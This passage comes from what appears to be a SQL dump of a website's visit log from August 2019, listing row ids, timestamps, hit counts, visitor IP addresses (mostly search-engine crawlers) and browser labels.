772,1,1,0,0,'157.55.39.199','other'),(439699,1564850831,1,1,0,0,'184.94.240.92','firefox'),(439700,1564851024,1,1,0,0,'40.77.167.205','other'),(439701,1564851283,1,1,0,0,'66.249.66.220','chrome'),(439702,1564852548,4,4,0,0,'66.249.66.218','chrome'),(439703,1564852707,1,1,0,0,'66.249.66.220','chrome'),(439704,1564853046,1,1,0,0,'157.55.39.79','other'),(439705,1564853198,1,1,0,0,'66.249.137.139','other'),(439706,1564853428,2,2,0,0,'40.77.167.205','other'),(439707,1564853461,1,1,0,0,'141.8.188.29','other'),(439708,1564854430,1,1,0,0,'180.76.15.137','other'),(439709,1564855457,1,1,0,0,'178.95.244.73','chrome'),(439710,1564855760,1,1,0,0,'51.68.152.26','chrome'),(439711,1564855995,2,2,0,0,'40.77.167.205','other'),(439712,1564856087,1,1,0,0,'141.8.188.29','other'),(439713,1564857205,1,1,0,0,'66.249.66.218','chrome'),(439714,1564857718,1,1,0,0,'8.29.198.27','other'),(439715,1564857908,1,1,0,0,'207.46.13.179','other'),(439716,1564858994,1,1,0,0,'66.249.66.222','chrome'),(439717,1564860148,1,1,0,0,'8.29.198.25','other'),(439718,1564860354,1,1,0,0,'66.249.66.218','chrome'),(439719,1564860849,1,1,0,0,'66.249.66.132','chrome'),(439720,1564860908,1,1,0,0,'207.46.13.50','other'),(439721,1564861032,1,1,0,0,'95.108.213.4','other'),(439722,1564861661,1,1,0,0,'207.46.13.179','other'),(439723,1564861774,2,2,0,0,'157.55.39.98','other'),(439724,1564862243,1,1,0,0,'66.249.66.222','chrome'),(439725,1564862796,1,1,0,0,'40.77.167.147','other'),(439726,1564863016,2,2,0,0,'207.46.13.50','other'),(439727,1564863233,1,1,0,0,'66.249.66.128','chrome'),(439728,1564864114,1,1,0,0,'173.212.233.72','chrome'),(439729,1564865205,1,1,0,0,'66.249.66.222','chrome'),(439730,1564865263,1,1,0,0,'66.249.66.218','chrome'),(439731,1564866319,1,1,0,0,'207.46.13.50','other'),(439732,1564866513,1,1,0,0,'5.45.207.79','other'),(439733,1564866671,2,2,0,0,'66.249.66.220','chrome'),(439734,1564866823,2,2,0,0,'40.77.167.147','other'),(439735,1564867365,1,1,0,0,'207.46.13.50','other'),(439736,1564867726,2,2,0,0,'66.249.66.220','chrome'),(439737,1564868432,1,1,0,0,'207.46.13.50','other'),(439738,1564868549,1,1,0,0,'8.29.198.25','other'),(439739,1564868641,1,1,0,0,'141.8.188.11','other'),(439740,1564868746,1,1,0,0,'66.249.66.220','chrome'),(439741,1564868790,1,1,0,0,'66.249.66.218','chrome'),(439742,1564869426,1,1,0,0,'207.46.13.50','other'),(439743,1564869515,1,1,0,0,'207.46.13.179','other'),(439744,1564869759,1,1,0,0,'66.249.66.220','chrome'),(439745,1564870473,3,3,0,0,'157.55.39.98','other'),(439746,1564870712,1,1,0,0,'87.250.224.47','other'),(439747,1564870736,1,1,0,0,'141.8.188.11','other'),(439748,1564870992,1,1,0,0,'8.29.198.27','other'),(439749,1564871497,1,1,0,0,'66.249.66.130','chrome'),(439750,1564871957,1,1,0,0,'141.8.188.11','other'),(439751,1564872350,1,1,0,0,'40.77.167.147','other'),(439752,1564872421,1,1,0,0,'66.249.66.218','chrome'),(439753,1564874452,1,1,0,0,'141.8.188.29','other'),(439754,1564874613,1,1,0,0,'185.162.145.210','firefox'),(439755,1564875043,1,1,0,0,'66.249.66.222','chrome'),(439756,1564875687,1,1,0,0,'66.249.66.218','chrome'),(439757,1564875737,1,1,0,0,'40.77.167.147','other'),(439758,1564875998,2,2,0,0,'66.249.66.222','chrome'),(439759,1564876016,1,1,0,0,'141.8.142.103','other'),(439760,1564876775,1,1,0,0,'40.77.167.147','other'),(439761,1564877618,2,2,0,0,'207.46.13.50','other'),(439762,1564877679,1,1,0,0,'141.8.188.29','other'),(439763,1564878176,1,1,0,0,'66.249.66.128','chrome'),(439764,1564878177,1,1,0,0,'66.249.66.132','chrome'),(439765,1564878179,1,1,0,0,'66.249.66.220','chrome'),(439766,1564878227,1,1,0,0,'157.55.39.98','other'),(439767,1564878729,1,1,0,0,'207.46.13.50','other'),(439768,1564879360,2,2,0,0,'66.249.66.128','chrome'),(439769,1564879386,1,1,0,0,'66.249.66.132','chrome'),(439770,1564879405,1,1,0,0,'8.29.198.26','other'),(439771,1564880369,1,1,0,0,'66.249.66.222','chrome'),(439772,1564880412,1,1,0,0,'157.55.39.98','other'),(439773,1564881118,1,1,0,0,'207.46.13.46','other'),(439774,1564881287,2,2,0,0,'66.249.66.220','chrome'),(439775,1564881603,1,1,0,0,'157.55.39.101','other'),(439776,1564881836,1,1,0,0,'8.29.198.25','other'),(439777,1564882346,1,1,0,0,'157.55.39.98','other'),(439778,1564883601,1,1,0,0,'141.8.188.11','other'),(439779,1564884884,1,1,0,0,'66.249.66.218','chrome'),(439780,1564884912,1,1,0,0,'207.46.13.46','other'),(439781,1564884991,1,1,0,0,'173.212.233.72','chrome'),(439782,1564885236,1,1,0,0,'141.8.188.29','other'),(439783,1564885425,1,1,0,0,'207.46.13.210','other'),(439784,1564885907,1,1,0,0,'66.249.66.218','chrome'),(439785,1564886154,121,121,0,0,'167.86.70.217','other'),(439786,1564886517,1,1,0,0,'207.46.13.46','other'),(439787,1564886665,1,1,0,0,'157.55.39.101','other'),(439788,1564886894,295,295,0,0,'185.6.8.3','other'),(439789,1564887798,305,305,0,0,'185.6.8.3','other'),(439790,1564888591,1,1,0,0,'66.249.66.218','chrome'),(439791,1564888650,1,1,0,0,'141.8.188.11','other'),(439792,1564888700,162,162,0,0,'185.6.8.3','other'),(439793,1564889104,1,1,0,0,'207.46.13.46','other'),(439794,1564889601,1,1,0,0,'66.249.66.130','chrome'),(439795,1564889674,1,1,0,0,'207.46.13.210','other'),(439796,1564890244,1,1,0,0,'8.29.198.26','other'),(439797,1564891034,2,2,0,0,'141.8.188.29','other'),(439798,1564891081,1,1,0,0,'141.8.188.11','other'),(439799,1564891093,4,4,0,0,'144.76.71.176','other'),(439800,1564891150,1,1,0,0,'66.249.66.220','chrome'),(439801,1564891516,1,1,0,0,'207.46.13.210','other'),(439802,1564891682,1,1,0,0,'66.249.66.130','chrome'),(439803,1564892489,1,1,0,0,'141.8.188.29','other'),(439804,1564892669,1,1,0,0,'8.29.198.25','other'),(439805,1564893242,1,1,0,0,'66.249.66.222','chrome'),(439806,1564893568,1,1,0,0,'66.249.66.132','chrome'),(439807,1564894200,1,1,0,0,'91.196.178.134','firefox'),(439808,1564894731,1,1,0,0,'66.249.66.218','chrome'),(439809,1564894880,1,1,0,0,'66.249.66.220','chrome'),(439810,1564895399,2,2,0,0,'207.46.13.210','other'),(439811,1564895726,1,1,0,0,'207.46.13.46','other'),(439812,1564896577,1,1,0,0,'207.46.13.210','other'),(439813,1564897303,1,1,0,0,'207.46.13.9','other'),(439814,1564897560,2,2,0,0,'207.46.13.210','other'),(439815,1564897618,1,1,0,0,'157.55.39.101','other'),(439816,1564897633,1,1,0,0,'207.46.13.46','other'),(439817,1564898102,1,1,0,0,'180.76.15.145','other'),(439818,1564898232,1,1,0,0,'87.250.224.65','other'),(439819,1564898627,1,1,0,0,'207.46.13.9','other'),(439820,1564900958,2,2,0,0,'66.249.66.222','chrome'),(439821,1564901095,1,1,0,0,'8.29.198.26','other'),(439822,1564902281,1,1,0,0,'95.108.213.4','other'),(439823,1564902847,1,1,0,0,'66.249.66.222','chrome'),(439824,1564903504,1,1,0,0,'8.29.198.26','other'),(439825,1564904056,2,2,0,0,'66.249.66.220','chrome'),(439826,1564904571,1,1,0,0,'193.106.30.99','chrome'),(439827,1564904957,1,1,0,0,'141.8.188.65','other'),(439828,1564904960,1,1,0,0,'95.108.181.57','other'),(439829,1564905698,1,1,0,0,'66.249.66.128','chrome'),(439830,1564905925,2,2,0,0,'207.46.13.210','other'),(439831,1564906067,1,1,0,0,'157.55.39.101','other'),(439832,1564906217,3,3,0,0,'66.249.66.218','chrome'),(439833,1564906253,1,1,0,0,'66.249.66.220','chrome'),(439834,1564907800,1,1,0,0,'66.249.66.220','chrome'),(439835,1564908660,1,1,0,0,'95.216.16.51','other'),(439836,1564909213,1,1,0,0,'207.46.13.210','other'),(439837,1564909228,1,1,0,0,'37.9.113.103','other'),(439838,1564909274,1,1,0,0,'66.249.66.222','chrome'),(439839,1564909295,1,1,0,0,'141.8.142.103','other'),(439840,1564909468,2,2,0,0,'207.46.13.100','other'),(439841,1564909516,1,1,0,0,'66.249.66.220','chrome'),(439842,1564910905,1,1,0,0,'213.180.203.40','other'),(439843,1564911417,1,1,0,0,'66.249.66.218','chrome'),(439844,1564911579,1,1,0,0,'66.249.66.222','chrome'),(439845,1564911940,1,1,0,0,'8.29.198.27','other'),(439846,1564912528,1,1,0,0,'109.74.154.72','chrome'),(439847,1564912582,1,1,0,0,'40.77.167.125','other'),(439848,1564913557,2,2,0,0,'207.46.13.177','other'),(439849,1564913696,1,1,0,0,'66.249.66.222','chrome'),(439850,1564913787,1,1,0,0,'66.249.66.218','chrome'),(439851,1564913863,1,1,0,0,'207.46.13.100','other'),(439852,1564914215,1,1,0,0,'66.249.66.130','chrome'),(439853,1564914355,1,1,0,0,'8.29.198.25','other'),(439854,1564914384,3,3,0,0,'66.249.66.220','chrome'),(439855,1564914398,1,1,0,0,'111.202.101.69','other'),(439856,1564914801,1,1,0,0,'66.249.66.222','chrome'),(439857,1564914846,2,2,0,0,'66.249.66.218','chrome'),(439858,1564914941,1,1,0,0,'178.154.171.24','other'),(439859,1564916100,11,11,0,0,'66.249.66.218','chrome'),(439860,1564916256,2,2,0,0,'66.249.66.130','chrome'),(439861,1564916429,3,3,0,0,'66.249.66.222','chrome'),(439862,1564916430,1,1,0,0,'157.55.39.175','other'),(439863,1564916477,2,2,0,0,'66.249.66.132','chrome'),(439864,1564916610,6,6,0,0,'66.249.66.220','chrome'),(439865,1564917234,1,1,0,0,'66.249.66.130','chrome'),(439866,1564917323,1,1,0,0,'66.249.66.218','chrome'),(439867,1564917613,1,1,0,0,'180.76.15.163','other'),(439868,1564918020,1,1,0,0,'157.55.39.175','other'),(439869,1564918065,1,1,0,0,'207.46.13.206','other'),(439870,1564918672,1,1,0,0,'66.249.66.132','chrome'),(439871,1564918813,2,2,0,0,'66.249.66.222','chrome'),(439872,1564919125,1,1,0,0,'157.55.39.140','other'),(439873,1564919213,1,1,0,0,'5.45.207.79','other'),(439874,1564920067,1,1,0,0,'207.46.13.206','other'),(439875,1564920478,1,1,0,0,'157.55.39.140','other'),(439876,1564920559,1,1,0,0,'207.46.13.100','other'),(439877,1564920671,1,1,0,0,'66.249.66.218','chrome'),(439878,1564921156,4,4,0,0,'157.55.39.175','other'),(439879,1564921325,1,1,0,0,'87.250.224.65','other'),(439880,1564922019,2,2,0,0,'207.46.13.206','other'),(439881,1564922029,2,2,0,0,'207.46.13.100','other'),(439882,1564922033,2,2,0,0,'157.55.39.140','other'),(439883,1564922388,3,3,0,0,'66.249.66.222','chrome'),(439884,1564922606,1,1,0,0,'5.45.207.19','other'),(439885,1564922679,1,1,0,0,'66.249.66.132','chrome'),(439886,1564922775,2,2,0,0,'141.8.188.29','other'),(439887,1564922781,1,1,0,0,'8.29.198.27','other'),(439888,1564923097,1,1,0,0,'66.249.66.220','chrome'),(439889,1564923388,1,1,0,0,'13.66.139.0','other'),(439890,1564924234,2,2,0,0,'157.55.39.175','other'),(439891,1564924386,1,1,0,0,'66.249.66.132','chrome'),(439892,1564924387,1,0,1,0,'66.249.66.130',''),(439893,1564924500,1,1,0,0,'141.8.188.11','other'),(439894,1564924788,1,1,0,0,'66.249.66.218','chrome'),(439895,1564924857,2,2,0,0,'157.55.39.140','other'),(439896,1564925189,1,1,0,0,'8.29.198.25','other'),(439897,1564925780,5,5,0,0,'66.249.66.218','chrome'),(439898,1564926141,1,1,0,0,'66.249.66.132','chrome'),(439899,1564926324,4,4,0,0,'66.249.66.220','chrome'),(439900,1564926574,1,1,0,0,'66.249.66.128','chrome'),(439901,1564926684,3,3,0,0,'66.249.66.222','chrome'),(439902,1564926711,6,6,0,0,'66.249.66.218','chrome'),(439903,1564926737,3,3,0,0,'66.249.66.130','chrome'),(439904,1564927636,1,1,0,0,'66.249.66.220','chrome'),(439905,1564927648,2,2,0,0,'66.249.66.218','chrome'),(439906,1564927786,1,1,0,0,'66.249.66.130','chrome'),(439907,1564928211,1,1,0,0,'157.55.39.175','other'),(439908,1564929130,6,6,0,0,'66.249.66.218','chrome'),(439909,1564929184,1,1,0,0,'66.249.66.132','chrome'),(439910,1564929423,1,1,0,0,'66.249.66.222','chrome'),(439911,1564929921,1,1,0,0,'141.101.134.52','chrome'),(439912,1564929952,1,1,0,0,'157.55.39.140','other'),(439913,1564930149,2,2,0,0,'66.249.66.220','chrome'),(439914,1564930186,3,3,0,0,'66.249.66.218','chrome'),(439915,1564931848,1,1,0,0,'66.249.66.220','chrome'),(439916,1564932238,1,1,0,0,'141.8.188.11','other'),(439917,1564932693,1,1,0,0,'66.249.66.218','chrome'),(439918,1564932933,2,2,0,0,'66.249.66.220','chrome'),(439919,1564933248,1,1,0,0,'157.55.39.140','other'),(439920,1564933619,1,1,0,0,'8.29.198.25','other'),(439921,1564933920,1,1,0,0,'66.249.66.220','chrome'),(439922,1564934105,1,1,0,0,'66.249.66.222','chrome'),(439923,1564934186,1,1,0,0,'66.249.66.128','chrome'),(439924,1564934381,1,1,0,0,'66.249.66.132','chrome'),(439925,1564934804,1,1,0,0,'193.106.30.99','chrome'),(439926,1564935181,1,1,0,0,'5.45.207.8','other'),(439927,1564935305,1,1,0,0,'66.249.66.222','chrome'),(439928,1564935601,1,1,0,0,'66.249.66.218','chrome'),(439929,1564935728,1,1,0,0,'207.46.13.8','other'),(439930,1564936035,1,1,0,0,'8.29.198.25','other'),(439931,1564936092,1,1,0,0,'157.55.39.140','other'),(439932,1564936674,1,1,0,0,'66.249.66.218','chrome'),(439933,1564936938,1,1,0,0,'40.77.167.16','other'),(439934,1564937385,1,1,0,0,'66.249.66.132','chrome'),(439935,1564937790,2,2,0,0,'46.211.98.89','chrome'),(439936,1564938251,4,4,0,0,'66.249.66.220','chrome'),(439937,1564938300,4,4,0,0,'141.8.188.29','other'),(439938,1564938717,2,2,0,0,'66.249.66.222','chrome'),(439939,1564939065,1,1,0,0,'66.249.66.128','chrome'),(439940,1564939084,2,2,0,0,'66.249.66.132','chrome'),(439941,1564939149,2,2,0,0,'207.46.13.8','other'),(439942,1564939185,2,2,0,0,'66.249.66.220','chrome'),(439943,1564939907,3,3,0,0,'66.249.66.222','chrome'),(439944,1564940111,1,1,0,0,'40.77.167.16','other'),(439945,1564940206,1,1,0,0,'181.214.186.39','other'),(439946,1564940228,2,2,0,0,'66.249.66.218','chrome'),(439947,1564940742,2,2,0,0,'66.249.66.220','chrome'),(439948,1564940903,1,1,0,0,'87.250.224.99','other'),(439949,1564940936,1,1,0,0,'5.45.207.19','other'),(439950,1564941276,3,3,0,0,'207.46.13.8','other'),(439951,1564941414,2,2,0,0,'66.249.66.222','chrome'),(439952,1564941925,1,1,0,0,'66.249.66.128','chrome'),(439953,1564942004,1,1,0,0,'40.77.167.127','other'),(439954,1564942355,1,1,0,0,'66.249.66.222','chrome'),(439955,1564942459,4,4,0,0,'66.249.66.220','chrome'),(439956,1564943186,1,1,0,0,'91.196.178.103','chrome'),(439957,1564943397,3,3,0,0,'66.249.66.220','chrome'),(439958,1564943597,4,4,0,0,'66.249.66.222','chrome'),(439959,1564943611,1,1,0,0,'66.249.66.218','chrome'),(439960,1564943927,1,1,0,0,'207.46.13.43','other'),(439961,1564944460,1,1,0,0,'8.29.198.27','other'),(439962,1564944701,2,2,0,0,'66.249.66.222','chrome'),(439963,1564944709,1,1,0,0,'66.249.66.128','chrome'),(439964,1564944835,1,1,0,0,'207.46.13.43','other'),(439965,1564945529,1,1,0,0,'207.46.13.206','other'),(439966,1564945738,2,2,0,0,'66.249.66.220','chrome'),(439967,1564945868,2,2,0,0,'66.249.66.218','chrome'),(439968,1564946180,1,1,0,0,'207.46.13.43','other'),(439969,1564946621,1,1,0,0,'46.211.67.210','chrome'),(439970,1564946878,1,1,0,0,'8.29.198.26','other'),(439971,1564946916,1,1,0,0,'40.77.167.16','other'),(439972,1564947572,1,1,0,0,'66.249.66.222','chrome'),(439973,1564947782,4,4,0,0,'66.249.66.218','chrome'),(439974,1564947814,1,1,0,0,'157.55.39.142','other'),(439975,1564947914,2,2,0,0,'66.249.66.220','chrome'),(439976,1564947998,1,1,0,0,'66.249.66.130','chrome'),(439977,1564948482,2,2,0,0,'40.77.167.115','other'),(439978,1564949068,2,2,0,0,'66.249.66.220','chrome'),(439979,1564949302,2,1,1,0,'66.249.66.218',''),(439980,1564949330,1,1,0,0,'202.46.57.120','chrome'),(439981,1564949581,3,2,1,0,'66.249.66.218',''),(439982,1564950245,1,1,0,0,'66.249.66.132','chrome'),(439983,1564950495,1,1,0,0,'207.46.13.43','other'),(439984,1564950886,2,2,0,0,'66.249.66.220','chrome'),(439985,1564951669,2,2,0,0,'157.55.39.80','other'),(439986,1564951868,1,1,0,0,'207.46.13.43','other'),(439987,1564952018,1,1,0,0,'66.249.66.132','chrome'),(439988,1564952322,1,1,0,0,'66.249.66.128','chrome'),(439989,1564952333,1,1,0,0,'66.249.66.130','chrome'),(439990,1564952711,1,1,0,0,'66.249.66.218','chrome'),(439991,1564952713,2,2,0,0,'157.55.39.80','other'),(439992,1564953073,3,3,0,0,'66.249.66.222','chrome'),(439993,1564953170,1,1,0,0,'66.249.66.220','chrome'),(439994,1564953587,1,1,0,0,'141.101.134.52','chrome'),(439995,1564953889,1,1,0,0,'66.249.66.218','chrome'),(439996,1564954025,1,1,0,0,'66.249.66.128','chrome'),(439997,1564954131,4,4,0,0,'66.249.66.222','chrome'),(439998,1564954393,1,1,0,0,'66.249.66.130','chrome'),(439999,1564954438,1,1,0,0,'141.8.188.29','other'),(440000,1564954824,3,3,0,0,'66.249.66.218','chrome'),(440001,1564954972,1,1,0,0,'157.55.39.80','other'),(440002,1564955301,1,1,0,0,'8.29.198.27','other'),(440003,1564955326,1,1,0,0,'207.46.13.95','other'),(440004,1564955514,1,1,0,0,'66.249.66.222','chrome'),(440005,1564955539,1,1,0,0,'207.46.13.168','other'),(440006,1564955686,1,1,0,0,'141.8.142.103','other'),(440007,1564955738,2,2,0,0,'66.249.66.218','chrome'),(440008,1564956037,1,1,0,0,'66.249.66.128','chrome'),(440009,1564956388,1,1,0,0,'207.46.13.43','other'),(440010,1564956720,1,1,0,0,'66.249.66.130','chrome'),(440011,1564957054,2,2,0,0,'66.249.66.222','chrome'),(440012,1564957715,1,1,0,0,'8.29.198.25','other'),(440013,1564957969,2,2,0,0,'66.249.66.220','chrome'),(440014,1564957980,2,2,0,0,'66.249.66.218','chrome'),(440015,1564958215,2,2,0,0,'66.249.66.222','chrome'),(440016,1564958645,1,1,0,0,'66.249.66.128','chrome'),(440017,1564959165,1,1,0,0,'66.249.66.218','chrome'),(440018,1564959187,1,1,0,0,'207.46.13.127','other'),(440019,1564959921,1,1,0,0,'95.108.181.94','other'),(440020,1564960111,2,2,0,0,'66.249.66.222','chrome'),(440021,1564960223,2,1,1,0,'66.249.66.220',''),(440022,1564961749,1,1,0,0,'66.249.66.218','chrome'),(440023,1564961948,1,1,0,0,'193.106.30.99','chrome'),(440024,1564962196,2,2,0,0,'66.249.66.222','chrome'),(440025,1564962353,1,1,0,0,'207.46.13.125','other'),(440026,1564962877,3,3,0,0,'66.249.66.218','chrome'),(440027,1564963115,1,1,0,0,'207.46.13.43','other'),(440028,1564963349,2,2,0,0,'66.249.66.220','chrome'),(440029,1564963461,1,1,0,0,'66.249.66.222','chrome'),(440030,1564964064,2,2,0,0,'66.249.66.218','chrome'),(440031,1564964567,1,1,0,0,'207.46.13.73','other'),(440032,1564964701,2,2,0,0,'207.46.13.148','other'),(440033,1564964737,1,1,0,0,'66.249.66.222','chrome'),(440034,1564964878,4,4,0,0,'66.249.66.220','chrome'),(440035,1564965056,1,1,0,0,'207.46.13.43','other'),(440036,1564965091,1,1,0,0,'69.12.72.162','chrome'),(440037,1564965537,1,1,0,0,'66.249.66.132','chrome'),(440038,1564965898,1,1,0,0,'207.46.13.125','other'),(440039,1564966145,1,1,0,0,'8.29.198.26','other'),(440040,1564966537,1,1,0,0,'66.249.66.132','chrome'),(440041,1564967697,1,1,0,0,'66.249.66.222','chrome'),(440042,1564967840,1,1,0,0,'66.249.66.218','chrome'),(440043,1564968553,1,1,0,0,'8.29.198.27','other'),(440044,1564968725,1,1,0,0,'13.66.139.0','other'),(440045,1564968996,1,1,0,0,'66.249.66.130','chrome'),(440046,1564969198,1,1,0,0,'66.249.66.222','chrome'),(440047,1564969425,1,1,0,0,'180.76.15.145','other'),(440048,1564969533,2,2,0,0,'66.249.66.128','chrome'),(440049,1564970573,1,1,0,0,'185.162.145.210','firefox'),(440050,1564971153,1,1,0,0,'40.77.167.206','other'),(440051,1564971621,1,1,0,0,'5.45.207.79','other'),(440052,1564972558,2,2,0,0,'66.249.66.218','chrome'),(440053,1564973869,2,2,0,0,'66.249.66.222','chrome'),(440054,1564973925,1,1,0,0,'157.55.39.35','other'),(440055,1564974411,1,1,0,0,'207.46.13.148','other'),(440056,1564975147,1,1,0,0,'66.249.66.220','chrome'),(440057,1564975175,1,1,0,0,'66.249.66.218','chrome'),(440058,1564975526,1,1,0,0,'66.249.66.128','chrome'),(440059,1564975930,1,1,0,0,'66.249.66.222','chrome'),(440060,1564976087,1,1,0,0,'40.77.167.216','other'),(440061,1564976260,2,2,0,0,'66.249.66.218','chrome'),(440062,1564976993,1,1,0,0,'8.29.198.27','other'),(440063,1564977864,4,4,0,0,'66.249.66.220','chrome'),(440064,1564978052,2,2,0,0,'66.249.66.130','chrome'),(440065,1564978135,2,2,0,0,'66.249.66.218','chrome'),(440066,1564978293,1,1,0,0,'66.249.66.132','chrome'),(440067,1564978474,1,1,0,0,'40.77.167.216','other'),(440068,1564979387,1,1,0,0,'8.29.198.25','other'),(440069,1564979739,2,2,0,0,'66.249.66.222','chrome'),(440070,1564980081,1,1,0,0,'66.249.66.128','chrome'),(440071,1564980422,1,1,0,0,'141.8.188.29','other'),(440072,1564981190,1,1,0,0,'66.249.66.220','chrome'),(440073,1564981363,1,1,0,0,'66.249.66.218','chrome'),(440074,1564981554,3,3,0,0,'40.77.167.216','other'),(440075,1564981601,1,1,0,0,'66.249.66.222','chrome'),(440076,1564982727,1,1,0,0,'66.249.66.128','chrome'),(440077,1564983091,1,1,0,0,'66.249.66.218','chrome'),(440078,1564984125,1,1,0,0,'66.249.66.222','chrome'),(440079,1564984747,1,1,0,0,'66.249.66.220','chrome'),(440080,1564984876,1,1,0,0,'66.249.66.130','chrome'),(440081,1564984946,1,1,0,0,'66.249.66.128','chrome'),(440082,1564984983,1,1,0,0,'66.249.66.218','chrome'),(440083,1564985383,1,1,0,0,'141.8.188.29','other'),(440084,1564985699,1,1,0,0,'66.249.66.220','chrome'),(440085,1564985969,2,2,0,0,'66.249.66.222','chrome'),(440086,1564986053,1,1,0,0,'66.249.66.128','chrome'),(440087,1564986743,1,1,0,0,'157.55.39.103','other'),(440088,1564987767,1,1,0,0,'66.249.66.220','chrome'),(440089,1564987829,1,1,0,0,'8.29.198.27','other'),(440090,1564988906,1,1,0,0,'66.249.66.128','chrome'),(440091,1564988933,1,1,0,0,'66.249.66.222','chrome'),(440092,1564989591,1,1,0,0,'66.249.66.218','chrome'),(440093,1564989718,3,3,0,0,'66.249.66.220','chrome'),(440094,1564989766,1,1,0,0,'40.77.167.216','other'),(440095,1564989999,1,1,0,0,'66.249.66.222','chrome'),(440096,1564990091,1,1,0,0,'207.46.13.131','other'),(440097,1564990239,1,1,0,0,'8.29.198.26','other'),(440098,1564990906,1,1,0,0,'66.249.66.220','chrome'),(440099,1564991992,2,2,0,0,'37.55.88.19','chrome'),(440100,1564993595,1,1,0,0,'66.249.66.218','chrome'),(440101,1564993799,1,1,0,0,'66.249.66.220','chrome'),(440102,1564994137,1,1,0,0,'5.45.207.79','other'),(440103,1564994217,1,1,0,0,'37.55.88.19','chrome'),(440104,1564995715,1,1,0,0,'94.179.147.66','chrome'),(440105,1564995802,1,1,0,0,'66.249.66.220','chrome'),(440106,1564996117,1,1,0,0,'207.46.13.197','other'),(440107,1564996135,1,1,0,0,'91.196.177.46','firefox'),(440108,1564997164,1,1,0,0,'66.249.66.193','chrome'),(440109,1564997534,1,1,0,0,'162.242.211.76','chrome'),(440110,1564998334,1,1,0,0,'207.46.13.197','other'),(440111,1564998481,1,1,0,0,'66.249.66.132','chrome'),(440112,1564998611,1,1,0,0,'141.8.188.29','other'),(440113,1564998670,1,1,0,0,'8.29.198.26','other'),(440114,1564999915,1,1,0,0,'109.74.154.72','chrome'),(440115,1565000271,1,1,0,0,'5.45.207.79','other'),(440116,1565000359,1,1,0,0,'40.77.167.6','other'),(440117,1565000585,1,1,0,0,'66.249.66.218','chrome'),(440118,1565000613,1,1,0,0,'207.46.13.197','other'),(440119,1565000685,1,1,0,0,'66.249.66.220','chrome'),(440120,1565001086,1,1,0,0,'8.29.198.27','other'),(440121,1565001156,1,1,0,0,'141.8.188.29','other'),(440122,1565001480,1,1,0,0,'180.76.15.26','other'),(440123,1565002372,1,1,0,0,'40.77.167.10','other'),(440124,1565002991,1,1,0,0,'66.249.66.130','chrome'),(440125,1565003175,1,1,0,0,'40.77.167.6','other'),(440126,1565003480,1,1,0,0,'180.76.15.17','other'),(440127,1565003751,1,1,0,0,'40.77.167.10','other'),(440128,1565003872,1,1,0,0,'87.250.224.107','other'),(440129,1565005778,2,2,0,0,'40.77.167.42','other'),(440130,1565005849,1,1,0,0,'66.249.66.220','chrome'),(440131,1565005918,1,1,0,0,'141.101.134.52','chrome'),(440132,1565005935,1,1,0,0,'95.133.27.60','chrome'),(440133,1565006107,1,1,0,0,'181.214.189.65','other'),(440134,1565006463,1,1,0,0,'87.250.224.99','other'),(440135,1565006472,1,1,0,0,'207.46.13.197','other'),(440136,1565008085,1,1,0,0,'37.55.88.19','chrome'),(440137,1565008488,1,1,0,0,'66.249.66.218','chrome'),(440138,1565008885,2,2,0,0,'141.8.188.29','other'),(440139,1565008939,1,1,0,0,'207.46.13.197','other'),(440140,1565008974,1,1,0,0,'66.249.66.220','chrome'),(440141,1565009517,1,1,0,0,'8.29.198.25','other'),(440142,1565009585,1,1,0,0,'66.249.66.218','chrome'),(440143,1565009715,1,1,0,0,'40.77.167.121','other'),(440144,1565010831,2,2,0,0,'66.249.66.218','chrome'),(440145,1565011916,1,1,0,0,'8.29.198.27','other'),(440146,1565012130,1,1,0,0,'40.77.167.42','other'),(440147,1565012310,2,2,0,0,'66.249.66.222','chrome'),(440148,1565012329,1,1,0,0,'66.249.66.220','chrome'),(440149,1565012971,1,1,0,0,'46.211.135.78','chrome'),(440150,1565013729,1,1,0,0,'91.229.226.9','chrome'),(440151,1565013883,1,1,0,0,'91.196.178.82','chrome'),(440152,1565013977,1,1,0,0,'40.77.167.121','other'),(440153,1565014108,1,1,0,0,'193.106.30.99','chrome'),(440154,1565015722,1,1,0,0,'66.249.66.130','chrome'),(440155,1565017645,1,1,0,0,'66.249.66.220','chrome'),(440156,1565017717,1,1,0,0,'66.249.66.218','chrome'),(440157,1565020369,1,1,0,0,'8.29.198.26','other'),(440158,1565020902,1,1,0,0,'91.196.178.76','chrome'),(440159,1565021148,1,1,0,0,'66.249.66.222','chrome'),(440160,1565021445,1,1,0,0,'13.66.139.0','other'),(440161,1565022174,1,1,0,0,'199.247.15.62','other'),(440162,1565022283,1,1,0,0,'91.196.178.186','chrome'),(440163,1565022748,1,1,0,0,'8.29.198.26','other'),(440164,1565023170,1,1,0,0,'40.77.167.157','other'),(440165,1565023432,1,1,0,0,'35.187.132.29','chrome'),(440166,1565023496,1,1,0,0,'207.46.13.75','other'),(440167,1565024102,1,1,0,0,'66.249.66.218','chrome'),(440168,1565024450,1,1,0,0,'66.249.66.220','chrome'),(440169,1565024458,1,1,0,0,'40.77.167.157','other'),(440170,1565024555,1,1,0,0,'66.249.66.132','chrome'),(440171,1565025117,1,1,0,0,'141.8.188.29','other'),(440172,1565025977,1,1,0,0,'66.249.66.220','chrome'),(440173,1565026860,1,1,0,0,'66.249.66.222','chrome'),(440174,1565028349,370,370,0,0,'185.6.9.220','other'),(440175,1565028807,1,1,0,0,'207.46.13.134','other'),(440176,1565029250,345,345,0,0,'185.6.9.220','other'),(440177,1565029532,1,1,0,0,'40.77.167.157','other'),(440178,1565031216,1,1,0,0,'8.29.198.27','other'),(440179,1565032536,1,1,0,0,'207.46.13.75','other'),(440180,1565033585,1,1,0,0,'8.29.198.26','other'),(440181,1565034168,1,1,0,0,'141.8.188.29','other'),(440182,1565034214,1,1,0,0,'207.46.13.105','other'),(440183,1565035193,2,2,0,0,'95.213.141.126','opera'),(440184,1565036250,2,2,0,0,'207.46.13.105','other'),(440185,1565036882,1,1,0,0,'66.249.66.218','chrome'),(440186,1565037200,1,1,0,0,'207.46.13.75','other'),(440187,1565040890,1,1,0,0,'66.249.66.222','chrome'),(440188,1565040934,1,1,0,0,'157.55.39.164','other'),(440189,1565041152,1,1,0,0,'66.249.66.220','chrome'),(440190,1565041867,1,1,0,0,'157.55.39.164','other'),(440191,1565042088,1,1,0,0,'8.29.198.26','other'),(440192,1565042329,1,1,0,0,'141.8.188.11','other'),(440193,1565043402,2,2,0,0,'40.77.167.11','other'),(440194,1565044364,1,1,0,0,'141.8.188.11','other'),(440195,1565044416,1,1,0,0,'8.29.198.27','other'),(440196,1565045080,1,1,0,0,'66.249.66.220','chrome'),(440197,1565045478,1,1,0,0,'141.8.188.11','other'),